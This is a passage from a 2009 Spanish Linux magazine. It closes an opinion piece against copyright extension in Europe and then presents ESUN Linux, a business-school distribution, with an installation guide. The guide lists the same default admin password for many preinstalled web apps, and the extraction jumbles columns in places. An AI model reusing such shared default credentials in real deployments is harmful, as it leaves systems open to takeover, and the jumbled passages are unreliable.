del dinero que tu has invertido anteriormente.
Si, en el caso de Marcos, nuestro escritor, has
invertido tres años de tu vida en escribir un
libro, tampoco es de recibo que se permita
que se difunda para el beneficio de ningún
tercero o, en detrimento de los beneficios del
propio autor.
Ahora bien, ¿qué son los derechos de autor?
Citando a la Wikipedia (http://es.wikipedia.org/
wiki/Derecho_de_autor), el derecho de autor
(del francés ‘derechir bita autore a la parmesa-
no’) es un conjunto de normas y principios que
regulan los derechos morales y patrimoniales
www.lpmagazine.org
conocimiento libre
Extensión del Copyright en Europa
que la ley concede a los autores (los derechos
de autor), por el solo hecho de la creación de
una obra literaria, artística o científica, tanto
publicada o que todavía no se haya publicado.
Es decir, uno tiene los derechos de autor de
cualquier creación que salga de él, tanto sea
música, literatura o cualquier otra obra. Incluso
si eres autor de un blog, tú tienes los derechos
de autor de todas las entradas que hayas escrito,
son unos derechos per-se, e incuestionables;
unos derechos más morales que establecen una
relación un tanto más espiritual del autor con
la obra.
Muy relacionado con los derechos de
autor, está el Copyright, un término anglo-
sajón que hace referencia a los derechos de
explotación que tiene un autor con una obra,
lo cual le da la potestad única de comerciar
con sus contenidos, generando valor a partir
de ellos. La diferencia entre ambos términos
puede parecer algo etérea, pero me remito
a las palabras de Pablo F. Burgueño (http://
www.pabloburgueno.com), abogado experto
en nuevas tecnologías en Abanlex, que dife-
rencia bastante bien ambos términos: en el
plano académico, la diferencia principal entre
Copyright y derechos de autor es que la pri-
mera otorga un ‘monopolio de explotación
exclusivamente económica’ a favor del autor
sobre su obra. En cambio, los Derechos de
Autor son contemplados como ‘la más sagra-
da de todas las propiedades’ reconociéndole
a su autor no solo derechos patrimoniales so-
bre su obra sino también morales (unidos al
‘espíritu de la creación del intelecto’).
Gracias a estas diferencias, la cadena de
transmisión de valor ha cambiado sustancial-
mente, pasando de ser el propio autor el que
comerciaba con sus obras, a establecerse in-
61
 conocimiento libre
Extensión del Copyright en Europa
termediarios encargados de la distribución de
las mismas. Para poder hacer esto, en la gran
mayoría de los casos, el autor renuncia al co-
pyright de sus obras, que pasa a estar en manos
de las editoriales, distribuidoras o productoras,
aunque conserva los derechos de autor. Como
los derechos de autor no son los que generan
capital económico de las obras, son las distri-
buidoras las que más se benefician de la explo-
tación del Copyright de las obras, pasando parte
de los beneficios a los autores.
Extensión
del Copyright
en Estados Unidos
La historia del Copyright en Estados Unidos
está llena de modificaciones y extensiones. En
1790 se establecían las bases federales para el
control del Copyright, marcando un plazo de
14 años, más otros 14 adicionales tras pedir una
prórroga, durante los cuales los autores eran
dueños y señores de sus trabajos, con derechos
únicos sobre sus obras para imprimir, reimpri-
Figura 3. Imagen de Mickey Mouse, protegida bajo Copyright hasta el 2020 gracias al acto de protección de
1998, y utilizada mediante el derecho a cita. (http://en.wikipedia.org/wiki/File:Copyright_term.svg)
62
mir, publicar y vender las copias de sus mapas,
gráficas y libros.
En 1831, se produjo la primera extensión
del Copyright en Estados Unidos, pasando
de 14 años a 28, más otros 14 adicionales al
pedir una prórroga. Además, establecía cláu-
sulas adicionales según las cuales, si un autor
fallecía durante ese periodo, los derechos pa-
sarían a manos de su viuda/o o sus hijos. Esta
extensión se aplicaba con carácter retroacti-
vo, de forma que los trabajos publicados en
los 14 años anteriores pasaban a tener unos
derechos similares.
En 1909, la gran mayoría de los países
habían adoptado el Convenio de Berna dónde,
instigados por Victor Hugo, se había estable-
cido la duración del Copyright en 50 años
después de la muerte del autor. Sin embargo,
Estados Unidos siguió una línea un tanto dis-
cordante estableciendo 28 años de copyright,
más una extensión de otros 28 años tras pedir
una renovación de los derechos. Además, se
establecía que solo se aplicarían estas normas
Linux+ 4/2009
a los trabajos que fueran publicados en algún
medio y establecieran una nota en la publica-
ción sobre el Copyright al que estaba sujeto
la obra.
El acto de extensión del Copyright de
1976 supuso una pieza clave de la legisla-
ción norteamericana en cuanto al tema del
Copyright y, aunque sería extendido poste-
riormente, es la base del Copyright actual
en ese país. En esta extensión, el gobierno
estadounidense se adhirió a la convención
internacional de Berna, estableciendo para el
Copyright un plazo de 50 años hasta después
de la muerte del autor. Sin embargo, debido
a la complicación de gestionar el copyright de
esta forma, estableció diversas modalidades.
Por un lado, los trabajos publicados con ante-
rioridad a Enero de 1976, estarían protegidos
durante 75 años desde su publicación, lo cuál
permitía proteger a los trabajos con copyright
posterior a 1909 gracias a los 28+28 años que
protegía el acto de 1909. Por otra parte, los
trabajos cuyo copyright recaía en corpora-
ciones, pasaban a estar protegidos durante 75
años. La razón que se esgrimió para proteger
los trabajos durante tanto tiempo es el avance
en las comunicaciones, que, según el Congre-
so, aumentaba sustancialmente la vida comer-
cial de la mayoría de las creaciones.
El acto de 1976 acercó a los Estados Uni-
dos a lo establecido en la Convención de Ber-
na, pero no sería hasta 1988 cuando entrarían
realmente dentro de este tratado gracias al
acto de extensión de 1988, también calificado
como el Acto de Protección de Mickey Mouse.
Este acto fue promovido por la compañía Dis-
ney que veía peligrar el copyright de muchos
de sus trabajos, en particular el de su persona-
je más carismático, Mickey Mouse, de ahí el
sobrenombre popular. Con este acto, las obras
pasaron a estar protegidas hasta 70 años des-
pués de la vida del autor, o en el caso de los
registros realizados por empresas, 120 años
después de la creación o 95 años después de
la publicación (lo primero que ocurriera).
Extensión
del Copyright en Europa
En Europa las leyes aplicables al Copyright
marcan una duración de 50 años, por lo que
durante esos 50 años, los propietarios del Co-
pyright de las obras tienen el control de la di-
fusión, reproducción, copia o modificación de
las mismas, pasando posteriormente al dominio
público.
En los últimos tiempos, ha habido varias
campañas por parte de los dinosaurios de la
música y otras artes, como Sir Cliff Richard
y Sir Paul McCartney (The Beatles) o Roger

Sobre el autor
José Carlos Cortizo Pérez es Ingeniero Su-
perior en Informática y, actualmente, doc-
torando en el programa de Ciencias de la
Computación de la Universidad Carlos III
de Madrid. Tras una dilatada experiencia
como consultor, actualmente compagina
sus labores como CTO en AINetSolutions
y Wipley, con labores docentes y de in-
vestigación en la Universidad Europea de
Madrid. Su bitácora personal se encuentra
en http://josekblog.blogspot.com
Por otra parte, José Carlos es miembro
de GLUEM (Grupo de Usuarios de Linux
y Software Libre de la Universidad Europea
de Madrid, http://www.gluem.org), orga-
nización muy activa que, de forma anual,
organiza las Jornadas de Informática de la
UEM (en Otoño) y las Jornadas de Conoci-
miento Libre (en Primavera).
Daltrey (The Who), tratando de extender la
duración del Copyright en Europa por otros
45 años más. La Unión Europea se hizo eco
de esta petición, y se está planteando el am-
pliar el plazo hasta los 95 años para, según sus
palabras, proteger a los artistas de forma que
se beneficien durante más tiempo. Siguiendo
su razonamiento, los artistas deben poder be-
neficiarse de sus derechos una vez pasado su
periodo de mayor productividad.
Sin embargo hay muchas cosas que no
cuadran. Para empezar, todos los trabajadores
han de labrarse un sueldo para su futuro a base
Figura 4. Europa se da cita con el Copyright. En los próximos meses veremos cómo se resuelve este tema
de invertir en pensiones, ya bien sea gracias
a sus contribuciones a la seguridad social o a pen-
siones privadas. ¿Por qué los artistas van a ser
menos? Es muy bonito levantar el estandar
del arte, gastarse todo el dinero a lo loco en
una juventud productiva y luego reclamar
más derechos cuando ves que no te queda un
duro, pero ante los gobiernos todos debería-
mos ser iguales y, con ello, a los artistas les
debería tocar pagarse su pensión como a todo
el mundo, ni más ni menos.
Por otra parte, y por mucho que se ar-
gumente que esta medida trata de defender a
los artistas, las grandes beneficiarias serán las
discográficas, que son quienes poseen los de-
rechos de explotación (Copyright) de las obras
y, con ello, quienes atesorarán las ganancias
adicionales. Según un estudio del Open Right
Groups, el 80% de los artistas recibirán entre
0,26 y 26 euros al año bajo la nueva ley, lo cual
representa algo totalmente despreciable, sin
embargo el coste para los ciudadanos ascenderá
a una cantidad entre 44 y 843 millones de euros
que, en gran medida, irán a parar a manos de las
discográficas.
Y aún es más, siguiendo el planteamiento
de Joost Smiers (profesor de Ciencia Política
de las Artes en la Utrech School of the Arts de
Holanda), la base filosófica del sistema de co-
pyright actual se apoya en un mal entendido:
la originalidad de los artistas es inagotable,
concepto que se aplica a creadores e intérpre-
tes. Pero la realidad indica otra cosa, porque
los artistas siempre tienen en cuenta las
obras creadas en el pasado y en el presente,
y agregan elementos al corpus existente. Esos
www.lpmagazine.org
conocimiento libre
Extensión del Copyright en Europa
agregados merecen respeto y admiración,
pero sería inadecuado otorgar a sus crea-
dores, intérpretes y productores derechos de
exclusividad monopólicos sobre algo que se
inspira en el conocimiento y la creatividad
que forman parte del dominio público y son
producto de la labor de otros artistas.
Los artistas crean sus obras en base a una
cultura y conocimiento popular y, sin em-
bargo, cobran por su producción cultural
y están tratando de que la misma tarde casi un
siglo en llegar a la cultura mainstream. Esta
postura es totalmente egoista y, en una era en
la que el conocimiento crece a velocidades
de vértigo gracias a las nuevas tecnologías,
no tiene sentido que se trate de retrasar la en-
trada de las obras en el dominio público. 50
años ya representa un cambio generacional
bastante duro y proteger obras por casi un
siglo supone que, la gran mayoría de ellas,
habrán caído totalmente en el olvido cuando
cesen sus derechos y, con ello se habrá per-
dido cultura.
Conclusiones
Queda patente que los gobiernos modifican
las leyes del Copyright ya no por un tema
de mantener a los autores, ni de preservación
de la cultura, sino debido a la presión de los
lobbies editoriales y discográficos que desean
maximizar la explotación de sus obras. Sin
embargo, el dejar de lado a los consumido-
res y los ciudadanos, genera un importante
descontento social que, entre otras cosas, se
ve traducido en aumento de las descargas
ilegales, como una forma de decir NO a la
explotación de la cultura por parte de estos
imperios discográficos y editoriales.
Como Sociedad, debemos decir NO a la
extensión del copyright, y fomentar la genera-
ción de cultura y el traslado de la misma al pa-
trimonio global. Esto no quiere decir que los
artistas no puedan verse recompensados por
su trabajo, claro que no, pero deberán verse
recompensados de forma directa durante un
tiempo y, posteriormente, de forma indirecta
gracias a las puertas que les abre el recono-
cimiento social. Además, tanto discográficas,
editoriales, como artistas, han de explorar
nuevos modelos de negocio que contenten
a todas las partes, incluidos los consumidores.
Herramientas como Spotify, que permiten el
consumo de música desde cualquier parte de
forma gratuita y legal, siembran el futuro de
esperanza para todos.
Ahora bien, ¿serán los gobiernos capaces
de frenar las presiones de los lobbies? ¿serán
capaces de entender que deben representar
a los ciudadanos y no solo a unos pocos?
63
 linux en la empresa
ESUN Linux
Software Libre,
desde el aula a la empresa
Juan Pablo Tobar
Hoy en día por cada área de administración de empresas existe una
amplia oferta de aplicaciones destinadas a mejorar la productividad
de los profesionales a cargo. Sin embargo, la integración de software
en la gestión no es sólo de interés de las empresas, también lo
es de las organizaciones encargadas de preparar a los futuros
profesionales del área.
E
n la primera parte de este artículo veremos como
linux@software.com.pl
la Escuela de Negocios de la Universidad de
Tarapacá (Chile) utiliza una distribución Linux,
que incluye software para la gestión de empre-
sas, en la formación de sus alumnos. En la segunda parte
sabrás cómo utilizar la misma distribución en tus propios
proyectos.
En el Aula
En esta primera parte conoceremos un perfil de la Escuela
de Negocios de la Universidad de Tarapacá (UTA) y luego
las razones que ha tenido esta institución para implementar
Linux y el Software Libre en la formación de sus alumnos.
La Escuela de Negocios
La Escuela de Negocios de la UTA cuenta con más de 40
años formando profesionales de la gestión de empresas, en-
tregando títulos de pregrado y postgrado tanto en su sede de
Chile como en el vecino país del Perú.
En efecto, la Escuela es heredera de la formación de in-
genieros comerciales que se iniciaría en Arica en el año 1966,
a través de la Universidad Católica del Norte; y cuya sede jun-
64 Linux+ 4/2009
to con aquella de la Universidad de Chile, darían luego origen
a la Universidad de Tarapacá, a inicios de los años 80.
A la carrera de Ingeniería Comercial pronto se le uniría
aquella de Contador Auditor- Contador Público y, reciente-
mente, la carrera de Ingeniería en Sistema de Información
y Control de Gestión. En el postgrado, la Escuela ha desarro-
llado sistemáticamente y ampliamente en el último tiempo
programas de MBA tanto en la ciudad de Arica como en
diferentes ciudades del Perú, a los que se suman otros progra-
mas de magíster, diplomados y cursos en diferentes áreas de
especialización empresarial.
La misión de la Escuela ha sido definida en términos de
desarrollar docencia de alta calidad para formar profesionales
competentes en el área de negocios, complementando aque-
lla con investigación aplicada. Su ámbito de acción ha sido
identificado y definido en la Región de Arica y Parinacota
(extremo norte de Chile) y, en los países de Perú y Bolivia.
Aspira también la Escuela, como visión, a transformarse
en una unidad académica reconocida e importante en la zona
norte del país, a través de la calidad de sus profesionales.
Como uno de sus objetivos estratégicos se cuenta el dotar
a las carreras de infraestructura y equipamiento necesario pa-

ra lograr profesionales competentes y, particu-
larmente le interesa a la Escuela, el disponer del
equipamiento tecnológico adecuado que permi-
ta efectivamente alcanzar aquel objetivo; a la
par de satisfacer las necesidades propias que
demanda la modernización permanente en los
planes de estudio de las carreras de pregrado,
orientadas esencialmente en base a competen-
cias y donde las tecnologías de la información
juegan un rol esencial.
Ventajas
de usar Linux en una
Escuela de Negocios
La razones que ha tenido la Escuela de Nego-
cios de la UTA para incluir a Linux en sus acti-
vidades formativas, se pueden analizar desde el
punto de vista de sus principales beneficiarios:
Para sus alumnos:
Entrega formación en una tecnología
de popularidad creciente
La Feria Internacional de Electrónica de Consu-
mo (CES), en Las Vegas, EEUU, es un evento
que desde 1967 entrega las principales tenden-
cias y anuncios del mercado tecnológico. En la
versión de este año, celebrada entre el 8 y 11 de
enero, destacó la amplia presencia de Linux en
múltiples nuevos productos, como por ejemplo:
portables, telefonía, servidores, virtualización
y soluciones de almacenamiento masivo.
La creciente popularidad de las soluciones
de Software Libre ha permitido que nos encon-
tremos con experiencias exitosas en casos tan
diversos como: servicios financieros (Bolsa de
Nueva York y Merril Lynch & Co.), Internet
(Google, Yahoo!), gobiernos y estados (China,
Figura 1. Opciones de arranque
Figura 2. El escritorio en modo Live
Brasil, India, California), investigación científi-
ca (NASA), entretenimiento (Pixar), transporte
(Boeing y FedEx) y defensa (Departamento de
Defensa de EEUU).
De esta manera, se hace necesario que se
entregue a los alumnos la oportunidad de co-
nocer alternativas que se estén popularizando,
con el fin de que reciban una formación que
se relacione directamente con las tendencias
actuales.
Por otra parte, las características únicas
de las aplicaciones libres, les da a los alumnos
la oportunidad de participar en las distintas
comunidades encargadas de desarrollar, docu-
mentar y/o difundir la plataforma, pudiendo
así promover la generación de conocimiento
local y potenciando la capacidad de trabajo
en equipo.
www.lpmagazine.org
linux en la empresa
ESUN Linux
Para sus profesores: más herramientas
para apoyar la formación
El software tiene la capacidad de involucrar al
alumno con los contenidos teóricos, es por esto
que incluirlos en los programas de formación se
torna muy importante.
Si utilizamos aplicaciones cerradas, la ca-
pacidad para incluir software en las asignaturas
estará limitada por los recursos disponibles
para adquirir licencias para cada programa
y cada equipo que utilicen los alumnos y, tam-
bién, a la capacidad de los alumnos de ad-
quirir dichas licencias en caso de que quieran
tener acceso a los mismos programas.
Por otra parte, la gran mayoría de las apli-
caciones abiertas son también gratuitas, por
lo que al desarrollar un sistema libre se tiene
acceso a miles de programas para ser usados
en el apoyo a las clases. Si quisiéramos hacer
esto mismo con software cerrado sería econó-
micamente inviable, al menos en número de
aplicaciones.
Para su entorno: Entrega soluciones
a problemas actuales
El organismo que reúne a los mayores pro-
ductores de software en el mundo, la Business
Software Alliance (www.bsa.org), en su último
reporte anual coloca a Latinoamérica como la
segunda región con mayor índice de piratería
en el mundo, con un promedio de 65% (la lista
la encabeza Europa central y del este con un
68%). Ya sea por el costo, la accesibilidad o la
baja fiscalización, esta situación de ilegalidad
es nociva tanto para proveedores como para
usuarios.
Las universidades además de influir en
su entorno con los profesionales que forma lo
hace liderando la generación de conocimiento
que ayude a solucionar los problemas de su
65
 linux en la empresa
ESUN Linux
Figura 3. Primer paso de la instalación: Selección del idioma
comunidad. En el caso particular del software •
en la gestión de pequeñas empresas existen dos
problemas básicos: el uso de programas sin li-
cencia (piratería) y el bajo índice de integración
de software en los procesos de negocio. Ambos
problemas pueden ser enfrentados entregando
una versión de Linux adaptada al entorno.
De esta manera, una distribución Linux con
software en las áreas de: CRM, ERP, contabi-
lidad, gestión de proyectos y gestión de recur-
sos humanos, permite profundizar la vincula-
ción con el medio de la Escuela de Negocios
y entrega a las empresas de menor tamaño la
oportunidad de aumentar el uso de software de
gestión de forma completamente legal y a un
bajo costo.
El Proceso de Migración
Una vez vistas las razones para implementar
Linux en la Escuela de Negocios veremos cuál Los directorios consultados para la búsqueda de trabajar para obtener finalmente uno adaptado
fue el proceso seguido. aplicaciones fueron:
Investigación
El objetivo general de la primera etapa fue
conocer la realidad actual de la Escuela de
Negocios, tanto a nivel de necesidades de
software como del tipo de hardware disponi-
ble para implementar el proyecto. Los objeti-
vos específicos de esta etapa fueron:
• Definir los tipos de perfiles de usuarios
(qué usuarios existen y qué funcionalida-
des requieren cubrir): Esta información
permitió definir las aplicaciones que final-
mente se incluyeron en el Sistema Opera-
tivo.
• Definir perfiles de hardware disponible:
Los perfiles (características de hardware),
permitieron conocer cuáles son los equi-
pos con los que interactuaría el Sistema.
66
• Sourceforge (http://sourceforge.net/),
• Freshmeat (http://freshmeat.net/browse/201/),
• LinuxAlt (http://www.linuxalt.com/),
• FSF (http://directory.fsf.org/),
• OSALT (http://www.osalt.com/es/),
• SOFOFA (http://www.sofofa.cl/sofofa/
index.aspx?channel=4319&appintanceid
=12189&pubid=5585),
• Ohloh (http://www.ohloh.net/projects/
search),
• Freealts (http://www.freealts.com/),
• Savannah (http://savannah.gnu.org/),
• GNA (https://gna.org/),
• Sourcewell (http://sourcewell.berlios.de/),
• Linuxrsp (http://www.linuxrsp.ru/win-lin-
soft/table-eng.html).
Aplicaciones
libres sobre Windows
Definir los programas y las características La segunda etapa buscó desarrollar experiencia
a incluir en el Sistema: La selección de las en uso de aplicaciones libres bajo Windows, en
aplicaciones que finalmente se incluyeron las funciones básicas de: navegación en Inter-
en el proyecto se realizó en tres etapas, net y cliente de correo. Afortunadamente dicha
integrando filtros en cada una de ellas: experiencia ya existía al momento de desarro-
– Filtro 1: Aplicaciones nativas para Li- llar el proyecto, mediante el uso de: Firefox
nux, liberadas bajo una licencia li- y Thunderbird.
bre, autorizada por la Free Software
Foundation o la Open Source Initia- Desarrollo
tive y con actividad durante el último
Una vez definidos los perfiles de usuarios y de
año (2417 aplicaciones). hardware, así como de las aplicaciones necesa-
– Filtro 2: Según madurez, idioma y pe-
rias para satisfacer las necesidades de dichos
riodicidad de actualizaciones (140 apli-
perfiles, se inició el desarrollo de la distribución
caciones). basada en Linux.
– Filtro 3: Medición del desempeño en Para el desarrollo se seleccionó como
equipo prototipo, según funcionalidades
distribución base a: Ubuntu Linux en su ver-
sión Minimal CD (9.9MB). Esta versión usa
entregadas versus uso de memoria RAM
y espacio en disco (31 aplicaciones).
un instalador en modo texto para entregarnos
un sistema básico, a partir del cual podemos
a nuestras necesidades.
Figura 4. Segundo paso de la instalación: Selección de la zona horaria
Linux+ 4/2009

Figura 5. Tercer paso de la instalación: Distribución del teclado
A partir del sistema base se instaló el
entorno gráfico, software de administración
y de funciones básicas y las aplicaciones para
la gestión de empresas (definidas en la etapa Capacitación
inicial del proyecto).
Pruebas de desempeño
La etapa anterior nos entregó una distribución
Linux basada en Ubuntu y adaptada a las ne- • Alumnos: Para este tipo de usuario se rea-
cesidades de la Escuela de Negocios. En esta
cuarta etapa se realizaron pruebas empíricas
para garantizar que el sistema final funciona
correctamente en los equipos disponibles.
Instalación en formato dual
Tan pronto se verificó que el Sistema funciona-
ba correctamente en los equipos, se procedió a
la instalación en formato dual, esto quiere decir
que se mantuvo el sistema existente (Windows
XP) y junto a este se instaló la distribución
Linux desarrollada, pudiendo el usuario selec-
cionar con cuál inicia cada sesión.
Este tipo de instalación se llevó a cabo con
el fin de tener mínimos impactos negativos en
la productividad de los involucrados. Lo ante-
rior se hace necesario debido a las siguientes
razones:
• La mayoría de los involucrados son usua-
rios de Windows por lo que una migración
total inicial podría impactar negativamente
en sus actividades diarias. Al hacerlo en
forma gradual, y apoyado por capacita-
ción, el proceso de cambio se hace menos
costoso en términos de adaptación.
• Puede que las alternativas libres a las
utilizadas actualmente por los profesores
no cumplan con todas las funcionalidades
requeridas, por lo que se necesitaría man-
tener el acceso a ellas y a la vez tener el Figura 6. Cuarto paso de la instalación: Particionado
sistema libre para aprovechar nuevos pro-
gramas.
Actualmente el proyecto se encuentra en esta
etapa, realizándose distintas capacitaciones
según el tipo de usuario. Por ejemplo:
lizan capacitaciones relacionadas con la
teoría del Software Libre, el uso del sis-
tema en general y el uso de aplicaciones
específicas para la administración de em-
presas. Los contenidos se entregan en un
curso como parte de su formación profe-
sional llamado: Uso Práctico de Software
para la Gestión de Empresas y también
como documentación electrónica. Cabe
señalar que la principal diferencia radica
en que los alumnos que toman el curso
www.lpmagazine.org
linux en la empresa
ESUN Linux
presencial estarán a su vez capacitados para
ser ayudantes en asignaturas que requieran
la inclusión de algunos de los programas
considerados en el proyecto.
• Profesores: Para el caso de los profesores
se ha considerado la capacitación a nivel
de teoría del Software Libre y en lo que
respecta al uso del sistema en general. Lo
anterior considerando la disponibilidad de
tiempo de este tipo de usuario y a que se
disponen de alumnos ayudantes para la
aplicación de programas específicos.
• Administradores: para quienes se encargan
de dar soporte y de mantener los equipos
de la Escuela, se considera la entrega de
contenidos en lo que respecta a adminis-
tración de sistemas Linux.
Migración total
Luego de realizada la capacitación se estará en
posición de evaluar si es posible migrar total-
mente a Linux (eliminando el arranque dual)
o si, por ejemplo, debido a la dependencia de
una aplicación disponible sólo para Windows,
se deben mantener ambos sistemas.
En la Empresa
En esta segunda parte veremos cómo puedes
instalar la distribución vista en la primera parte
y cuáles son las principales aplicaciones que
incluye.
Instalando la distribución
El proceso de instalación es muy similar a la
mayoría de las distribuciones. A continuación
veremos la descripción de cada uno de los
pasos.
El primer paso es descargar ESUN Linux
desde el sitio web del proyecto (www.esunlinux.
67
 linux en la empresa
ESUN Linux
Figura 7. Quinto paso de la instalación: Información de usuario
com). Una vez descargado lo quemamos en un
CD, lo colocamos en el lector y reiniciamos el
equipo. Si todo a resultado bien lo que debe-
rías ver es una pantalla similar a la que está
presentada en la Figura 1. Las opciones que
tenemos son:
• Iniciar ESUN Linux Live CD en Modo Grá-
fico: Esta opción es una de las más usadas
ya que permite probar el sistema sin tener
que instalarlo, porque corre directamente
desde el CD. Una vez que lo has probado
puedes usar el icono que está en el escritorio
para instalar el sistema en tu disco duro (esto
es lo que veremos en los siguientes párrafos.
Se recomienda este tipo de instalación en
equipos de más de 256M de RAM).
• Iniciar ESUN Linux Live CD en Modo Grá-
fico a Prueba de Fallos: Puedes utilizar esta
opción si falla en iniciar el entorno gráfico
en la opción anterior.
• Instala ESUN Linux Live CD: La tercera
alternativa te permite exclusivamente rea-
lizar el proceso de instalación sin iniciar el
escritorio.
• Verifica la Integridad del CD/DVD: Che-
quea el CD que contiene el sistema que se
desea ejecutar.
• Test de Memoria: Realiza pruebas sobre la
memoria RAM.
• Inicia desde el Primer Disco Duro: Si no
se desea iniciar ninguna de las opciones
anteriores se puede seleccionar arrancar
desde el sistema operativo que esté insta-
lado en el primer disco duro.
Una vez que has seleccionado Iniciar ESUN
Linux Live CD en Modo Gráfico, se cargarán
todas las aplicaciones necesarias hasta llegar al
escritorio que se ve en la Figura 2. Figura 8. Sexto paso de la instalación: Importar configuración
68
Para iniciar la instalación hacemos doble
click en el icono Instalar del escritorio. El
primer paso que se debe completar es seleccio-
nar el idioma que utilizaremos durante todo el
proceso (Figura 3). En segundo lugar seleccio-
namos nuestra zona horaria (Figura 4).
Luego de la zona horaria seleccionaremos
la distribución de nuestro teclado. Para asegu-
rarte de que has seleccionado correctamente
puedes probar escribiendo en el campo dispo-
nible en la zona inferior (Figura5).
Uno de los pasos más importantes es la
preparación del disco duro y la selección de
la partición que usaremos para instalar el
sistema. Una partición no es más que una
división del disco que utilizamos para un fin
en particular. Un disco puede tener 1 partición
(el disco completo) o varias particiones, es
decir, el disco dividido en varias secciones. El
instalador te ofrece tres alternativas de parti-
cionado (Figura 6):
Linux+ 4/2009
• Guiado (cambia tamaño del disco): Es
la primera opción y es útil cuando tienes
otro sistema ya instalado. Esta opción te
permitirá usar el espacio que queda dis-
ponible, creando dos particiones, una en
la que dejará el sistema que ya tenías
instalado y otra en la que se instalará tu
nuevo sistema.
• Guiado (utilizar todo el disco): Esta
opción es recomendable si quieres de-
jar en tu equipo solamente el sistema
que estás instalando. Se debe conside-
rar que si seleccionas esta opción y tu
equipo tiene instalado otro sistema, este
será borrado.
• Manual: Puedes utilizar esta opción si
previamente realizaste el particionado de
tu disco y quieres tener un mayor control
sobre la selección de las particiones.
En el paso 5 el programa de instalación nos pide
nuestros datos personales:
• Nuestro nombre,
• El nombre de usuario y la clave con los
cuales nos identificaremos en el sistema
(obviamente es muy importante que recor-
demos estos datos),
• Y finalmente un nombre para el equipo.
Opcionalmente podemos seleccionar que se
inicie automáticamente la sesión (generalmente
usado en sistemas de kioskos interactivos, ver
Figura 7).
El penúltimo paso nos pregunta si quere-
mos importar los documentos y configuracio-
nes de cuentas que existan en otros sistemas
presentes en el equipo (Figura 8). Si no se
necesita importar solo se presiona el botón
Adelante.
 linux en la empresa
ESUN Linux

• Abanq (http://abanq.org/);
• Dolibarr (http://www.dolibarr.org/):
– usuario: demo,
– clave: democlave,
– administrador: admin,
– clave: admin1378;
• SQLLedger (http://sql-ledger.com/):
– usuario: demo,
– clave: democlave,
– clave administrador: admin1378;
• SugarCRM (http://www.sugarcrm.com/):
– usuario: demo,
– clave: democlave,
– administrador: admin,
– clave: admin1378;
• vTigerCRM (http://www.vtiger.com/):
– usuario: demo,
– clave: democlave,
Figura 9. Último paso de la instalación: Confirmación
– administrador: admin,
Por último se nos muestra un resumen con A continuación veremos, en mayor detalle, – clave: admin1378.
todas las opciones que hemos seleccionado. cuáles son las aplicaciones incluidas en ESUN
Si estamos de acuerdo con todo presionamos Linux, clasificadas según el área a la que per- Gestión de Proyectos
Instalar y esperamos a que el proceso concluya tenecen. Para aquellas aplicaciones que lo En esta área existe una amplia oferta de apli-
(cerca de 20 minutos según las características requieran se indica también la información de caciones libres, pero aquellos que se desem-
del equipo). ingreso (nombre de usuario y clave). peñaron mejor en las pruebas son los si-
Una vez concluida la instalación, se nos guientes:
pedirá que retiremos el CD del lector y que ERP/CRM
reiniciemos el equipo. Al reiniciar, si tenemos La Planificación de Recursos Empresariales • Achievo (http://www.achievo.org/):
más de un sistema operativo, se nos preguntará (ERP por sus siglas en inglés) y la Adminis- – usuario: demo,
cuál deseamos utilizar, de lo contrario arrancará
tración de la Relación con el Cliente (CRM), – clave: democlave,
directamente con el que acabamos de instalar forman dos de las principales herramientas – administrador: administrator,
(Figura9). de gestión de empresas actuales, por lo que el – clave: admin1378;
software de apoyo a estas actividades ha co- • Dotproject (http://www.dotproject.net/):
Las aplicaciones incluidas brado gran popularidad e importancia en los • usuario: demo,
Una vez finalizada la instalación ya tenemos últimos 15 años. • clave: democlave,
nuestro sistema funcionando desde el disco Los programas ERP/CRM incluidos son • administrador: admin,
duro y podemos ver con mayor detenimien- los siguientes: • clave: admin1378;
to los programas que tenemos disponibles.
Además de las aplicaciones típicas el sistema
también incluye programas basados en Web.
Sobre estos últimos se debe señalar que para
su correcto funcionamiento se necesita que
esté corriendo el software encargado del ser-
vicio Web (Apache) y alguna de las bases de
datos que se incluyen en el sistema (MySQL
o Postgresql).
Cuando se intenta acceder a una aplicación
basada en Web el sistema verifica si están co-
rriendo correctamente los servicios Web y de
base de datos, de no ser así le indica al usua-
rio que debe iniciarlos antes de poder usar
el programa. Para arrancar estos servicios
ejecutamos los siguientes comandos en una
terminal (una línea a la vez según el servicio
que se necesite iniciar):

sudo /etc/init.d/apache2 start

sudo /etc/init.d/mysql start
sudo /etc/init.d/postgresql-8.3 start Figura 10. Página principal del proyecto AbanQ

www.lpmagazine.org 69
 linux en la empresa
ESUN Linux
• Egroupware (http://egroupware.org):
– usuario: demo,
– clave: guest,
– administrador: admin,
– clave: admin1378;
• Planner (http://live.gnome.org/Planner);
• TUTOS (http://www.tutos.org/):
– usuario: demo,
– clave: democlave,
– administrador: admin,
– clave: admin1378.
Contabilidad
Si bien los programas ERP integran módulos
de contabilidad, es importante entregar esta
función individualmente ya que es posible
que empresas de menor tamaño no requieran
todos los módulos que incluyen los ERP:
• GNUCash (http://www.gnucash.org/);
• Homebank (http://homebank.free.fr/
index.php?id=4).
Comercio Electrónico
Se han incluido dos de las más populares apli-
caciones de comercio electrónico con el fin de
que el usuario tenga un entorno de pruebas
antes de publicar su tienda en Internet:
• Oscommerce (http://www.oscommerce.
com/):
– administrador: admin,
– clave: admin1378;
• Magento – http://www.magentocommerce.
com/
– administrador: admin,
– clave: admin1378.
RRHH
Al contrario de las categorías anteriores, la
oferta de programas maduros y en español
para la gestión de recursos humanos es limi-
tada. Sin embargo, cabe destacar que entre
Sobre el autor
Juan Pablo Tobar dirige actualmente Ad-
melix EIRL (http://www.admelix.com), em-
presa orientada a desarrollar soluciones
basadas en Software Libre para empre-
sas. Ingeniero Comercial y profesor part-
time de la Escuela Universitaria de Nego-
cios de la Universidad de Tarapacá. Sus
intereses se centran en la aplicación he-
rramientas libres en entornos organiza-
cionales. Su bitácora personal es: http://
www.kickbill.com
70
Figura 11. Página principal de SugarCRM
los programas ERP existen módulos para esta • Phpmyadmin (http://www.phpmyadmin.
actividad: net/home_page/index.php);
• Phppgadmin (http://phppgadmin.sourcefor
• OrangeHRM (http://www.orangehrm. ge.net/).
com/):
– usuario: demo1, Internet
– clave: democlave, Las aplicaciones de esta sección están des-
– administrador: admin, tinadas a servir las funciones de navegación
– clave: admin1378. y acceso a correo electrónico.
Oficina • Epiphany (http://projects.gnome.org/
La generación y edición de documentos de ofi- epiphany/);
cina es una de las actividades más recurrentes, • Claws Mail (http://www.claws-mail.org/).
es por esto que se han incluido aplicaciones que
cubren exitosamente las funcionalidades que Gráficos
entregan programas propietarios: Por último se incluye la principal herramienta
de edición gráfica de Software Libre:
